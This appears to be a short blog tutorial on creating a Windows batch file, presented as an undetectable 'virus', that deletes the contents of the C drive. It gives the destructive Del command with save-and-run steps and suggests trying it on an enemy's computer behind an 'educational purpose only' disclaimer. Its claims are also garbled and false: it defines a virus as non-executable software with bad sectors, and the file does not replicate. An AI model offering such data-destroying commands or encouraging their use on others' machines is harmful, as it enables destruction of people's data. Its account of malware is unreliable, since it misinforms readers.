In computers, a virus is a program or programming code that replicates by being copied or initiating its copying to another program, computer boot sector or document. The virus can be transmitted as attachments to an email note or in a downloaded file, or be present on a diskette or CD.
In simple words, Virus is non-executable malicious software with bad sectors, and if you trying to execute virus file, this will definitely harm your computer.
So in this post, we’re talking about how to create a real virus on your laptop and it will also can’t be detected by any antivirus.
Related Post:
Related Post:
NOTE: THIS POST IS ONLY FOR EDUCATIONAL PURPOSE ONLY AND WE’RE NOT RESPONSIBLE FOR ANYTHING YOU WANT TO DO RELATED THIS POST.
What is the working of this virus?
This virus will delete the C drive completely so be careful and we request you to use this trick for the purpose of knowledge and if you have an enemy just try on his computer.
This virus created by using batch programming so don’t modify the code we’re providing below.
How to Create the VIRUS?
1. Open Notepad and copy below code into it.
@Echo off
Del C:\*.* ly
2. Save this file as virus.bat (you can change the name what you like but .bat is necessary).
3. Now running this file can delete your all data from C drive.
WARNING: Please do not try to run on your own computer or else it will delete all the content of your C drive.
This virus only works for windows, for other operating systems this is just a waste file.
Hope you like this post, or having any problem related to this post so feel free write in a comment below about this post and please share if you like, See sharing button is right below.